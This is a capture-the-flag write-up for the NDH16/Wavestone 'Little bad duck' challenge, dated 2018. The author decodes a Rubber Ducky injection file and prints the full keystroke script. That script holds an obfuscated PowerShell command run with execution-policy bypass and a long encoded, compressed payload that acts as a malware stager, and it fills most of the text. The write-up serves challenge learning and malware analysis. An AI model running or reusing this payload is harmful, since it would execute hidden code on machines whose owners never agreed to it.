NDH16/Wavestone - Step 1 - Little bad duck

Challenge description

Mr Samberg Hi Jake, thank you for agreeing to work with us.

Jake No problem. So you’re in charge around here, is that fair to say?

Mr Samberg Absolutely, I’m the boss

Jake Well, in that case, I’ll let you describe what happened to your company.

Mr Samberg It looks like my boss’s computer has been infected with a malware. We have put our top specialists on the case. They ran every antivirus they knew of, but they found nothing. The only suspicious thing we have is an SD card that the janitor has found outside of the boss’s office. I’ve sent you the only file present on it.

Jake I’ll get started then. But wait, didn’t you say you were the boss?

Your task is to analyse the file and find anything that looks interesting to you.

Solution

We were provided a file named inject.bin. The name of the challenge is a hint, the file is an encoded Rubber Ducky payload. We can use an online tool to retrieve the original script. (All of the commonly used scripts failed to retrieve the payload because of the french keyboard layout!).

Here is the full script:

DELAY
cmdREM Congratz on your first flag: WAVE{b2496b42dbc8e507885221ae5853da0a}%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc IAAuACAAKAAgACQAcABTAEgAbwBtAGUAWwAyADEAXQArACQAUABzAEgATwBtAGUAWwAzADAAXQArACcAeAAnACkAIAAoACAATgBFAFcALQBPAEIASgBFAEMAVAAgACAAcwBZAFMAVABlAG0ALgBJAG8ALgBjAE8AbQBwAHIARQBTAHMAaQBPAE4ALgBEAGUARgBsAEEAVABlAHMAVAByAEUAYQBtACgAWwBJAE8ALgBNAGUAbQBPAFIAeQBTAFQAUgBlAEEAbQBdACAAWwBjAE8ATgBWAEUAcgB0AF0AOgA6AEYAUgBPAE0AYgBBAHMAZQA2ADQAcwB0AHIASQBOAGcAKAAnAFQAWgBSAFoAagA1AHQAWQBFAEkAWAAvAGkAaAA5AGEAMAAyADMAUgBNAGMAMQBpAE0AQwAzAGwAQQBlAE4AcgB3AEQAYQA3AFcAVgB0AFIAeABHAFoAMgBMAHAAdABaAG4ATwBTAC8AagB6AFYANQBtAGIAZABTAGYAYQBwAFMAbABZADcATwBXAGYAMgB6AGUAbAB1ADkAQQBOAG4ANgBEAEcARgBsAE4AQwBEADgASQB0ACsAeAA3AFQAdQArAC8AZgBFAHQAaAA2AEwAOAArAHIAcAArADgAagBxADIAdgA4AEgAOQBDAFgARABYAGwAYQBoAHMATwBFAFYAcQBPAHQARAAzAG8AaQBKAHYAbwB2AGgAMgBZAGEAKwB4AGMAZQAyAEEAWAA3ADEAOQA5AFUAdAAvAEIAZABKAEcAaABKAHMAcQByAGgAUgA5AE0AUQBZADkAWgBxAHMAZgBxAHkALwBqAEwAKwBDAGcAUABJAEoAdQArAFAASAA1AGUAZABNAFYAYQBlADgAYgBnAEMASwBmAHMAMQBuAE4AdgA2ADEAZQBaAFUAdABsAGoASABtAGEAZwBZAG8ANQBmAFgAYQBRAEIAVAAwAFYAcABWAHkAbABSAFoAdABQAGoAMgBhAGYAWgB4ADgAdABJADgAdwBlAFcATABKAHoATwBVAFkAbgArADgATwBYAHoARwBHAHMAYgA4AGoAaQAxAHkARQBuAGUASgBWAFQAUAAzAFkAUgBGAGMAWgBCAE8ASgA4AHcAWgBFAFMAYgBpAFYASABWAEwAWABVAFAAQwBuAEoARQAxAEMAdAArADIAdgBKADMASgAzAFoAeQB0AEQANwBqAEwAZQBGAFYAbAB6AEcAWQBrAEIAdABEADQAeQBqAGgANABTAEgAYQBqAFoASABEADQAKwByAFEAUgByAFgAcgBlAHQAbwBjAHAAcQBWAC8AZgBDAHgAcQBvAGcAMABZAG4AQgBJAGsAegBRAEoAUgB5ACsAYwA1ADUAWQB2AFMATgBvAHcASwBtAHYAaQBlAFIANwByAEoASwBTADYAVAB1AGUAaQA3AG8AMwBoAHUAWABJAE0ATQBRAFcAMQA3AE4AcABIAFYANQBOAGwATQB4AEYANwAxAFQALwByAFIAMQBSAEgAWABDADYAagB6AEMAVQA4AFgAbgBqAGQAcQA4AEoAZwBmAGkAWgBIAHIAawBMAGwAYQBwAEQAMABVAGQASwBZAFgAMwBoADMAcwBqAEMAcgBkADUANABkAE0AZwBHAHgASQBwAGIASQBnAEgAUQBxAFYAeQA0AEoAYgB5AHQAKwBoAFIAcQBWADIAWABvAHgAagBjAEQAKwBSAHAAZABLAHkAbQBVAFMANAAwADkAWgBMAGoAcQBhAGUAVQBQAGMAbwBqADcASQBqAE8AdwBIAHoATABNAGEAawBSAGoAVwBDAFIAYQBaAEkAWQB0AFkAVwBoAHEAagBKAHMAcwAyAG4AUABUAHMARABFAG8ASABDAGwAYQBVAGUAdABiAFkATABOAGQASgBsAEUAMgB0ACsALwBtAGEATQByAE0AUgA2AFIAVQBOAFMAYwA2AFYAeQBtAG8ANgBrADUAZwAxADgAdABKAEEAWQB3AGgAUgBJAEkAQgA3AGsAZwBPAFkAawBRADgAOQA1AEMAVQBRAG4ANgBtAHcATgBiAEsAKwBLAFoAYQBEAEwAWQBqADUAYgA0AE4AQQBUAGcAcABYAFAAZQBDAGsAUwBCAHoALwBiADgAMgBFADEAWABMAEEARQBTADUAYQBLAFUAeAA2AFYAcQA1ADAAWgBKACsAWQBSADAAVwBMADEAVwByAHkARwBrAGEAZABrAHAANQByAFgASwA0AG8ALwA2AHMAcgBTAEUAbQBVAEIAVwBqAGMARwBTADgATQB0AFYASQBkAHIAMwBmADUAUwBRACsAdQBwAFQAcAAxADAAeQAxAEkAYQBqAE0AcwByAFUAegBMAHoAMgBLADYARgBCAHEAeAB3AFQAVwB4AEcAWABCAEMAYwA3AEQAeABiADkATgBhAGUAQgBaAEYATABzAEoASQB0AGsAdgB0AGsAOABUAHgANQBjAFkATgBpAFYAMQBKAHEAYgBJAGoAMABMAFgAbgBlAGUARQBJADEAWABnAGkAYgBiAEoASAAyAGUAbwBrADAAbQBSAHQAdQB6AGQAbgBDADEAYgBpADYAYwBmAE4AbwA1AFgASgBRAHQAVABMAGgANwBnAG4AagBHAHQAbABUADEAWQBhAFIAVABWAHMAWABJAGoAMABMADEAcwBuAGkAbQBZAGwAUAB2AGIAYQBQAGgATABQAHkAQwBBADYAKwBkAGgAQQBQADEAeQBZAC8AWQBBAEsAMQBMAFgAQwB6ADcAZABvAGsAbwAvAHkAVwBoADIAeAAyAGQARABTAEcAUwAxAHIAVgBMAGsAdABzAFIAbgBWAG0AOABqAEIAeABvAEkAeABxAFEAaABiAE4ASABHADcATgBKAGQAaABEAHcAQQBPAHoATwBmAG4AOABiAHYALwBCAFEAQgBqAHAAZAA2AHEAbgBLAEIAVABDAEMANQBxAGcAbQBXAEEAVABNAHEAYgBHAGUAUABDAEIAMABhAFAAWAA0AEMAbgBhAHgANwBrAFcANQBVAGUAOABqADQAbQBhAHEAagBRAEcAdAA1AFMAYgAvAEsAQwBuAGgAMQB3ADYAZwBaAEMAaABoAEoAOAAvAFgARgB5AG4AMAByAG4AeAB6ADAAUwBNADkAZwB6AGYATAB2AG4AVgBRAGQAVwBjAFIAQgB4ADYAUgBoAEgARgB1AEsAdgBZAEgATgBjAEsAYQB0AC8ASgAyADAAaAB2ADAAZgBFAFIAQgAwAFcARwA5AHAATgBEADcAUABCADUAWgBNAHEAQQA5AGsAcQBmAEQAZwBKADAAKwB2ADcAOQBkAGIAVgArAFgAMwAxAGwAYwBQAE4ATQBBAGwAVwBQAEQAVQBPAEUAOQBkAE8AeABrAHQAbwBCAHcAOABpAGcAWABDAGsASAA4AEgAUgB1AEIAUAA3AHIAUABmAGwANgA5AFgAdAAxAFYATABxAFkANQBkAEoAZgAvADQAdQBJADMAdQAwAEgAVQBHADAAeQBaAGYATQAzAEYAbgBUAEEASABrAEQAMwA5AHYATAB6AC8AVwB1AEkANQAyAEUARAA2AGgAQgBHAFkAcAAwADgAZAAvAGsARwBKADQAcgByAFAANgB2AGYATgA5AGoARgBmAGkAagA4AGUAdgBtADUAZQBSAGEASABLADQAegByADYARwAzADkAWgAvADAAdgAnACkALAAgAFsAUwBZAFMAVABFAE0ALgBJAG8ALgBjAE8AbQBwAFIAZQBzAHMAaQBPAG4ALgBjAE8AbQBQAFIARQBTAFMASQBPAG4ATQBPAGQAZQBdADoAOgBEAEUAYwBvAG0AUABSAGUAUwBzACkAfABGAG8AUgBlAEEAQwBIAHsATgBFAFcALQBPAEIASgBFAEMAVAAgACAAaQBvAC4AUwBUAFIAZQBBAE0AUgBFAEEAZABFAFIAKAAkAF8AIAAsACAAWwBTAFkAUwBUAGUAbQAuAHQAZQB4AHQALgBlAG4AYwBPAGQASQBOAGcAXQA6ADoAYQBzAGMAaQBpACkAfQApAC4AUgBFAGEAZABUAE8AZQBuAEQAKAAgACkA

The first flag is WAVE{b2496b42dbc8e507885221ae5853da0a} and we have the payload, it will be usefull for step 2 :)

Author: Crypt0-M3lon @Crypt0_M3lon

Post date: 2018-06-30